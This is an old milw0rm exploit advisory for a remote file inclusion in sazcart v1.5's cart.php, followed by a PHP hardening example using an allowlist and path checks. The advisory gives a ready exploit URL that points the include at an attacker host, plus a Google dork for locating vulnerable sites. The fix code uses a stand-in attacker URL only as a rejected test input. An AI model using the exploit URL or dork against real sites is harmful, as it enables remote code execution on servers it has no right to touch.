sazcart v1.5 (cart.php) Remote File include

*********************---Hitamputih crew---********************************
* Bug Found By : IbnuSina
* vendor : http://sazcart.com/site
* Risk : High
* Greetz :
* Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid
* and all member hitamputih crew community www.kaipank.org/forum
* especially thx to str0ke@milw0rm.com
***************************************************************************

bug found on admin/controls/cart.php

include($_saz['settings']['shippingfolder'] . "/shipping.php");
$Shipping = new Shipping;
include($_saz['settings']['taxfolder'] . "/tax.php");
$Tax = new Tax;

exploit :

http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?

google dork: "powered by sazcart"

# milw0rm.com [2006-11-04]
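
The include() calls in cart.php take their folder from $_saz['settings'], which the advisory's URL fills in from the query string. The following is an added example, not sazcart's own code, showing the same include guarded by an allowlist and a base-directory check. The helper name saz_module_path, the folder names and the demo directory are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: returns an absolute path that is safe to include,
// or throws. $allowed is a fixed server-side list, never request data.
function saz_module_path(string $baseDir, string $folder, string $file, array $allowed): string
{
    // An allowlist rejects URL wrappers (http://, ftp://, php://) and
    // traversal strings outright, because none of them are listed names.
    if (!in_array($folder, $allowed, true)) {
        throw new InvalidArgumentException('module folder not allowed');
    }
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory missing');
    }
    // realpath() resolves symlinks and ".." so the prefix check is reliable.
    $path = realpath($base . DIRECTORY_SEPARATOR . $folder . DIRECTORY_SEPARATOR . $file);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('module file outside base directory');
    }
    return $path;
}

// Constructed demo layout: <tmp>/shipping/shipping.php
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'saz_demo_' . getmypid();
@mkdir($base . '/shipping', 0700, true);
file_put_contents($base . '/shipping/shipping.php', "<?php class Shipping {}\n");

$allowed = ['shipping', 'tax'];   // assumed folder names
$inputs  = [
    'shipping',                   // value from the server-side config
    'http://attacker.invalid/x?', // constructed request-supplied value
    '../../etc',                  // constructed traversal attempt
];
foreach ($inputs as $folder) {
    try {
        include_once saz_module_path($base, $folder, 'shipping.php', $allowed);
        echo "loaded:   $folder\n";
    } catch (Exception $e) {
        echo "rejected: $folder (" . $e->getMessage() . ")\n";
    }
}
$Shipping = new Shipping;         // class came from the vetted local file
unlink($base . '/shipping/shipping.php');
rmdir($base . '/shipping'); rmdir($base);
```

The settings array itself should be initialised inside the script from server-side configuration before use, so a request parameter named _saz cannot supply it. Keeping allow_url_include off in php.ini blocks the URL form of the include independently of this check.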